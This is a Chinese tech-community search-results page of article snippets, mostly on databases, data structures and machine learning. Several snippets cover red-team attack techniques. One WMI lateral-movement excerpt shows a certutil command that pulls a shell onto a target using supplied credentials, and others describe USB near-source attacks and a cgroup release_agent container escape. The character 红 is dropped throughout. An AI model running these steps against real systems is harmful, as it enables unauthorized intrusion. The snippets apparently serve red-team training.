首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

蓝对抗近源渗透

01 什么是蓝对抗 蓝对抗原本是一个军事概念,指在部队模拟对抗时,专门成立一个扮演假想敌部队(蓝军)与我方正面部队(红军)进行对抗性演练。...在信息安全领域中蓝对抗也是类似的思路,一方扮演黑客,另一方扮演防守者进行网络安全攻防演练。在演练过程,蓝军模拟真实攻击来评估企业现有防守体系安全能力,红军对发现问题做出相应优化整改。...通过周期性蓝对抗攻防演习,持续性地提高企业在攻击防护、威胁检测、应急响应方面的能力。 需要注意,国外流行使用Red Team(队)代表攻击方,Blue Team(蓝队)代表防守方。...在本文中,笔者将挑选其中较为通用且容易在蓝对抗实施近源渗透技术进行探讨。...插入电脑到恶意操作执行完所需时间不过几秒,这可以帮助你给那些离开工位不锁屏同事好好上一课。

91140

硅谷网基础教深度学习数学,视频演示不可错过

Siraj Raval 作为深度学习领域自媒体人在欧美可以说是无人不知、无人不晓。 凭借在 Youtube 上指导视频,Siraj Raval 在全世界吸粉无数,堪称是机器学习界。...雷锋字幕组为大家最新译制了 Siraj 深度学习系列,机器学习和神经网络架构类型到数据可视化、小样本学习等基础到应用技巧,争取带领希望掌握神经网络神奇魔力和想成为深度学习工程师大家伙早日入坑!...(建议在 Wi-Fi 环境下观看视频,土豪随意~) 为了方便流量不足小伙伴们在路上看,我们特意整理出了图文版: 数学帮我们定义了神经网络规则,让我们能够数据挖掘更多价值。...假如有了给定数据,可以用下面的公式来正规化: ? 让这一列每一个值减去这列最小值,然后再除以这列最大值与最小值差。...同样运算在下一层内,我们把第一层得到值传播到第二层,计算与第二个权矩阵点乘然后用非线性变换成一个输出概率。 因为我们只有三层神经元,输出值是我们预测值。

1.3K90
您找到你想要的搜索结果了吗?
是的
没有找到

物联网在车联网场景 TiDB 探索和实现

作者简介:薛超,物联网有限公司数据库运维高级工程师 物联网有限公司是中国移动通信集团公司投资成立全资子公司,公司按照中国移动整体战略布局,围绕“物联网业务服务支撑者、专用模组和芯片提供者、...在我们验证过程,发现 3 个节点处理不了,于是我们扩展到 8 个节点,这个时候基本上可以承载整个轨迹服务数据写入了,但是业务侧逻辑又变得相当繁重,维护成本非常高,因此想找一个中间件来替代代码分片功能...为了解决这个问题,我们也咨询了官方同事,进行了一些优化,比如调整批量更新来减少开销,扩容一个 TiDB server 节点,最重要是把 TiDB 版本 2.04 升级到 3.05。...第二,TiDB 兼容现有的 MySQL 语法和协议,迁移成本低。我们 MyCat 集群迁移到 TiDB 业务代码都非常少。...在数据迁移方面,历史数据通过开发迁移小工具, MyCat 集群读取出来,然后写到 TiDB 集群,数据是在代码层做双写,我们很顺利将数据迁移到了 TiDB。

1.1K22

轻松搞定面试黑树问题

Structures 教你透彻了解黑树  详细解答 1.stlset底层用什么数据结构?...在实际系统,例如,需要使用动态规则防火墙系统,使用黑树而不是散列表被实践证明具有更好伸缩性。Linux内核在管理vm_area_struct时就是采用了黑树来维护内存块。...找到树第i小结点; [cpp] view plaincopy OS-SELECT(x;,i)   r = size[left[x]] + 1;   if i == r   return...   return OS-SELECT(left[x], i)   else return OS-SELECT(right[x],  i)   思路:size[left[x]]表示在对x为根子树进行序遍历时排在... y == y.p.right                    r = r + y.p.left.size +1            y = y.p   return r   思路:x秩可以视为在对树序遍历种

62540

数据结构黑树详细解析

树 树: 数据结构是以二叉堆形式出现 如果链表观点出发,相当于是放宽了有序要求 允许两个不同位置元素有相等序 对于序为n节点来说,可以指向多个序为n+1节点: 相应后者称为前者孩子...黑树具有良好效率,可以在 时间内完成查找,增加,删除操作 JavaTreeMap, HashMap都是基于黑树数据结构实现 黑树性质: 根节点是黑色 节点是红色或者黑色 叶子节点是黑色...2倍 黑树最短路径: 都是由黑色节点构成 黑树最长路径: 由红色节点和黑色节点相间构成 根据任意一个节点到对应每个叶子节点所有简单路径中都包含相同数目的黑色节点性质可知最长路径时 : 红色节点数量...第一点要求等价于: 任何一个末代孙节点到根节点简单路径,黑色节点数目相同 任何两个末代孙节点抵达任意一个相同父节点简单路径,黑色节点数目相同 父节点和叔叔节点都为红色: 如果向已有的黑树插入新节点...顺序统计树除了属性外,节点还包含子系个数信息size size为当前节点为根子树所有节点个数 顺序统计树插入节点实现: 在实现黑树基础上 首先在节点结构体添加一个成员size 然后修改插入操作

99910

(VRAR)NLP应用:原理到实践

NLP在虚拟现实与增强现实引领之力虚拟现实(VR)和增强现实(AR)代表了当前科技领域中最令人激动发展方向。这两项技术不仅在娱乐行业引起了巨大关注,还在教育、医疗、培训等领域展现出巨大潜力。...虚拟现实是一种通过计算机技术创建模拟环境,使用户感觉好像置身于一个完全不同现实世界。通过戴上VR头戴设备,用户可以沉浸在虚拟环境,与其中元素进行互动,创造出一种全新感官体验。...NLP在虚拟现实与增强现实关键技术2.1 语音识别与交互语音识别是NLP在虚拟现实与增强现实关键技术之一。通过NLP算法,系统能够理解用户语音指令,并以自然方式与用户进行交互。...在VR和AR应用,虚拟助手通过NLP算法理解用户自然语言输入,并以文本或语音形式回应,为用户提供更智能体验。...通过情感分析,系统可以感知用户情绪,并相应地调整虚拟环境元素,以提供更加个性化和情感丰富互动体验。

54980

Numpyascontiguousarray说起

(Column-major Order),即内存同列存在一起。...译文 所谓contiguous array,指的是数组在内存存放地址也是连续(注意内存地址实际是一维),即访问数组下一个元素,直接移动到内存下一个地址就可以。...如果想要向下移动一列,则只需要跳过3个块既可(例如,0到4只需要跳过1,2和3)。 上述数组转置arr.T则没有了C连续特性,因为同一行相邻元素现在并不是在内存相邻存储了: ?...这时候arr.T变成了Fortran 连续(Fortran contiguous),因为相邻列元素在内存相邻存储了。...性能上来说,获取内存相邻地址比不相邻地址速度要快很多(RAM读取一个数值时候可以连着一起读一块地址数值,并且可以保存在Cache)。这意味着对连续数组操作会快很多。

1.3K10

关于黑树,在HashMap是怎么应用

前言 " 在阅读HashMap源码时,会发现在HashMap中使用了黑树,所以需要先了解什么是黑树,以及其原理。从而再进一步阅读HashMap链表到黑树转换,黑树增删节点等。..." - - 刘志航 什么是黑树? 黑树概念 黑树性质 黑树操作 在HashMap是怎么应用? HashMap 1 什么是黑树?...黑树概念? " 黑树(英语:Red–black tree)是一种自平衡二叉查找树,是在计算机科学中用到一种数据结构,典型用途是实现关联数组。..." —— 维基百科 黑树五大性质 " 黑树是每个节点都带有颜色属性二叉查找树,颜色为红色或黑色。...(每个叶子到根所有路径上不能有两个连续红色节点。) 任一节点到其每个叶子所有简单路径都包含相同数目的黑色节点。

44230

黑客(队)攻防内网环境下WMI利用

通过这个模型,我们可以方便地远程计算机获取管理数据,也就是说,你可以在自己电脑上查看和管理其他电脑信息。...计算机用户并且创建一个进程运行cmd.exe程序.而下一步就是将shell下载到目标计算机,这一步我们需要在新进程中下载certutil.exe...Credential $credential -ScriptBlock { cmd.exe /c "certutil.exe -urlcache -f -split $url"}Kali端成功回显并且在目标机也发现...test.exe文件.值得注意是这段命令test.exe&&test.exe&&叫做谓词开关,我们可以在这里添加运行其它命令,例如写成:/test.exe /nobreak && test.exe...wmicexec进行横向渗透时,Windows操作系统默认不会将WMI操作记录在日志同时无需将wmicexec.py移动到目标机上,所以隐蔽性较高,因为WMI是Windows管理工具,所以大多数基于

12700

图解ConcurrentHashMap链表升级为黑树过程

02 Java8 ConcurrentHashMap Java 8及之后版本ConcurrentHashMap去除了Segment数组和分段锁方案,使用和HashMap相同结构,也就是数组、链表和黑树结构...table数组每个元素实际上存储都是单链表头节点或者黑树根节点,当向ConcurrentHashMap插入键-值对时,首先要定位到要插入桶,也就是要定位到table数组某个索引下标处。...为此,在Java 8及之后版本JDK,ConcurrentHashMap会在一定条件下将内部链表自动转化为黑树,如下所示。...可以看出,当ConcurrentHashMap数组长度大于或等于64、table数组任意一个链表长度大于或等于8时,会将长度大于或等于8链表转化为黑树,数组其他位置链表保持不变。...通过对本篇学习,读者能够源码级别深刻理解线程池核心原理和执行流程。 为了进一步加深读者对线程池理解,在本篇随书源码,会给出完整手写线程池案例程序。 本书特色 1.

1.2K10

异常处理:生活插曲到代码挑战

异常:生活与代码无奈 2. 异常体系结构:错误与异常 3. 异常处理:抓取异常,保障稳定 3.1 throw 和 throws 3.2 try...catch 3.3 finally 4....自定义异常:灵活应对特定问题 结语 在人类日常生活和编程世界,异常都是无法绕过存在。...异常:生活与代码无奈 异常,顾名思义,就是一种与正常情况不符事件或情况。在生活,我们时常遇到各种异常,比如拉肚子、被狗咬等。...而在编程,异常则是指在程序执行过程遇到问题,如空指针、数组越界、类型转换异常等。就如同生活我们会感到不适,需要采取相应措施治疗,代码异常也需要得到妥善处理,以确保程序正常运行。 2....编译时异常:需要在代码编写阶段处理异常,例如IO异常等。 运行时异常:在程序运行过程可能发生异常,如空指针、数组越界等。 3.

13010

元宇宙你,是要药丸还是蓝药丸?

真实世界早已破败不堪,人们在残垣断壁之间啃食着恶臭垃圾,却在幻觉以为自己在五星级酒店想用丰盛晚宴。 知道了真相主人公窗台奋力一跃,当他睁开眼睛,他重又跌回了那个冰冷下水道。 3....科幻作家星辰大海式太空歌剧,来到了以悲观反乌托邦、反人类中心主义、赛博朋克、废土等为主题时代。...电影《黑客帝国》开头,探讨了这一主题,墨菲斯给出了药丸和蓝药丸,作为电影主角,注定选择真相“The One”尼奥自然会选择药丸,但在现实你,让你来选择,你真的有勇气选择那颗红色药丸吗?...我曾经和大学一位同学探讨过这个问题,他说:即便世界是假,一切都是虚拟,但对我们来说,真的假又有什么区别,即使我们在《黑客帝国》世界,我们活着目的也仅仅是享受人生,那为什么还要去选择药丸呢...选择相信哪一个,不正是这部小说主题 -- 蓝药丸还是药丸吗?

48020

数据台建设数据认知开始

数据概念由来已久,技术产品构成上来讲,比如数仓、大数据中间件等产品组件相对完备。但是我们认为依然不能把数据台建设作为一个技术平台项目来实施。...金融机构在数字化转型进程建立数据台,必须战略高度、组织保障及认知更高层面来做规划。...我们知道石油提纯有一系列标准体系,那么数据资产化也同样需要建立完备数据资产体系。金融机构数据资产体系建设必须围绕业务价值,推动业务数据向数据资产转化角度来构建。...应用层:按照金融企业特定业务场景,标签层、主题层抽取数据,面向业务进行加工特定数据,以为业务提供端到端数据服务。...当然,有些特定业务场景需要兼顾性能需求、紧急事物需求,也可能直接贴源层抓取数据直接服务于特定业务场景。真正做到在对业务端到端数据服务同时,兼顾数据灵活性、可用性和稳定性。

1.6K40

蓝对抗云原生漏洞挖掘及利用实录

回顾近几年腾讯蓝军在云原生安全上探索和沉淀,我们在2018年时候开始正式投入对Serverless和容器编排技术在攻防场景预研,并把相关沉淀服务于多个腾讯基础设施和产品之上,而在近期内外部蓝对抗演练腾讯蓝军也多次依靠在云原生场景上漏洞挖掘和漏洞利用... CGroup 信息,不仅可以判断我们是否在容器内,也能很方便判断出当前容器是否在 Kubernetes 编排环境。...其思路在于利用Docker容器镜像分层文件存储结构(Union FS), mount 信息找出宿主机内对应当前容器内部文件结构路径;则对该路径下文件操作等同于对容器根目录文件操作。...1、首先我们需要利用在 release_agent 中提及方法 mount 信息找出宿主机内对应当前容器内部文件结构路径。 sed -n 's/....[dc19c5f5a428c125aef50ed31372cc73.png] 由于这里10250鉴权当前Kubernetes设计是默认安全,所以10255开放就可能更加容易在蓝对抗起到至关重要作用

1.5K10

损坏手机获取数据

比如粉碎、射击手机或是直接扔进水里,但取证专家仍然可以找到手机里证据。 如何获取损坏了手机数据呢? ?...对于制造商来说,他们使用这些金属抽头来测试电路板,但是在这些金属抽头上焊接电线,调查人员就可以芯片中提取数据。 这种方法被称为JTAG,主要用于联合任务行动组,也就是编码这种测试特性协会。...要知道,在过去,专家们通常是将芯片轻轻地板上拔下来并将它们放入芯片读取器来实现数据获取,但是金属引脚很细。一旦损坏它们,则获取数据就会变得非常困难甚至失败。 ?...图2:数字取证专家通常可以使用JTAG方法损坏手机中提取数据 数据提取 几年前,专家发现,与其将芯片直接电路板上拉下来,不如像导线上剥去绝缘层一样,将它们放在车床上,磨掉板另一面,直到引脚暴露出来...比较结果表明,JTAG和Chip-off均提取了数据而没有对其进行更改,但是某些软件工具比其他工具更擅长理解数据,尤其是那些来自社交媒体应用程序数据。

10K10

gitlab 事件吸取教训

比如说:黑客攻击了你服务器,删除了所有的备份,怎么恢复服务器运行? 你 DRP 可能是:多级备份,数据除了本地备份外,还备份到一个权限更高,远程,物理上隔离地方。...gliffy Eric(Head of Engineer)说 "data transfer is taking longer than expected",可见第二种方案,他们备份和生产环境在不同物理位置...在这样前提下,1PB 数据需要大概 243 个小时进行传输,而 gliffy 日志看,他们花费在数据传输上所花时间大概 12 - 24 小时,所以,大致猜测 gliffy 要传输数据在 50...注意,在网络上传输数据很可能是压缩过数据,所以,实际数据量可以要比这个大一倍到几倍。 对于 gliffy 这样工具而言,48 小时还不足以致命,但在线交易,游戏这样平台,可能就是灾难性。...(对于 gitlab,即便权限系统被绕过,在执行包含有 rm -rf 脚本前,也会先备份,在备份期间,清醒过来 sysadmin 还可以撤销这个操作,即便没撤销,还有一份最新磁盘映像可以恢复) 希望大家

908100

AS 引申出新玩意

光看概念看不太懂,说白了就是整个网络就是有很多个 AS 组成,你可以看成一个个村,每个村都有好多人家,看作是被管辖 IP 地址,这个 IP 地址范围都要你去申请。...有了 AS 就等于你拥有了自己公网网段,上网时查 IP 归属地就会显示你自己 AS 名字,也会带上你 ASN。就比如一般人 IP 查出来都是 xx 电信,你就不同了,会显示你自己起名字。...BGP 大致指多个 AS 之间选路算法,目前多数云宣称采用 BGP,网络稳定和快速提高卖点。那么如果采用 BGP 选一条好路线出口,速度和时延都有很大提升。...peer 在 AS ,你需要 peer 别人 AS 到达指定路由,也就是类似这种。 如果没有一个合适 peer,那么就变成环球慢线了。...peer 可以说是一个互通中继点,别人过去,别人也能通过你。那么就有流量和带宽一说,我最开始问题是计费和被恶意刷流。

78420
领券